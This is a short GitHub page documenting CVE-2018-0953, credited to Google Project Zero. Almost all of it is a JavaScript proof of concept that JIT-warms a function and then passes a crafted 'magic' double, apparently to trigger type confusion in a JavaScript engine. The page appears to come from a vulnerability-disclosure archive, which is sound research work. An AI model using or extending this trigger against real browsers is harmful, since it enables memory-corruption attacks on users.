Skip to content

Latest commit

 

History

History
31 lines (22 loc) · 657 Bytes

CVE-2018-0953.md

File metadata and controls

31 lines (22 loc) · 657 Bytes
Raw

CVE-2018-0953

  • Fix: May 2018
  • Credit: lokihardt of Google Project Zero

PoC

function opt(arr, value) {
    arr[1] = value;
    arr[0] = 2.3023e-320;
}

function main() {
    for (let i = 0; i < 0x10000; i++)
        opt([1.1], 2.2);

    let arr = [1.1];
    opt(arr, -5.3049894784e-314);  // MAGIC VALUE!

    print(arr);
}

main();

Reference